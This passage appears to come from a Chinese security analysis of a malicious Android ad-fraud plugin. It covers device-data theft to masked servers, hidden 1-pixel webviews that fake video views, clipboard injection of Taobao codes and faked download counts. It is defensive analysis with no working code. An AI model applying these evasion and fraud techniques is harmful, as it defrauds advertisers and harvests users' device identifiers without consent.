恶意应用会定时联网与服务器通信,更新并加载最新的SDK恶意插件,根据流量监测情况,频繁调整刷量功能及业务范围,该插件通过接收与响应服务器下发指令,后台隐藏执行多种作弊刷量推广业务,进而实现自身牟利,目前最新版本的作弊刷量推广业务涵盖搜索、购物、新闻、视频、红包等多个领域。

五、应用详情分析

恶意功能导图:

5.1母包代码结构:

请求数据包含要执行的刷量,上报,检测等任务插件

请求链接:d.b***net.com

请求数据:网络类型,IMEI,type,model,IMSI,版本,手机品牌,系统版本等内容

返回内容:包括子包id,包名,子包下载url,软件名,描述等

5.2注册/监控设备

恶意模块启动后,主要完成一下几个动作:

1.将软硬件基本行为信息,如硬件imei,nettype,version,andver,brand,model设备及监控视频状态,据POST提交到服务器来注册设备:p**.**.com

2.监控设备:上报用户操作设备数据,包含app_list 列表…

3.先访问CNZZ的数据中心:z*.**.com设备id,推测此请求是用来统计感染的设备数量

4.发送设备数据到a.b**net.com来注册受害设备

服务器响应数据包:与首次安装该软件信息对比,用户更新的软件信息

5.3周期性拉新

通过随机包名插件,基本属于同款恶意拉新插件,代码相似度极高,代码中便开始周期执行恶意功能并启动拉新服务。

上报数据统计中心服务器,统计感染的设备数量

5.4刷视频曝光量

通过创建很难被察觉的1pdi像素webview窗体来播放视频,通过调用JS接口进行交互,所有触摸,滑动事件会同时响应到webView上,模拟点击webwiew网页中操作,这样做就真实模拟到用户网页浏览行为,欺骗广告运营商的流量统计反作弊算法,来变相进行刷量的目的。

视频播放一段时间后,通过JS判断是否播放成功,来决定后续的任务执行逻辑

攻击视频网站搜狐,爱奇艺,youku,365yg,pptv等

使用js脚本刷视频点击量:

js函数监听页面操作播放,暂停,点击,停止

js函数计算页面元素相对位置,并进行滑动,点击操作

5.5电商产品引流

请求内容包括:拉新应用包名,网络类型,IMEI,手机品牌,系统版本等内容

利用剪贴板功能,周期性的将口令写入到剪贴板中,这样当用户打开电商app应用后,会自动引流对应的推广页面来完成指定淘宝网店引流

服务端响应内容包括:淘宝口令,点击id,包名等

5.6关键字优化

优化产品关键字和形容词,进行搜索查询,来欺骗搜索引擎算法提高搜索结果先后顺序

5.7刷下载量

产品曝光来按下载量计费,此恶意插件通过伪造CPD下载量来达到不法牟利的目的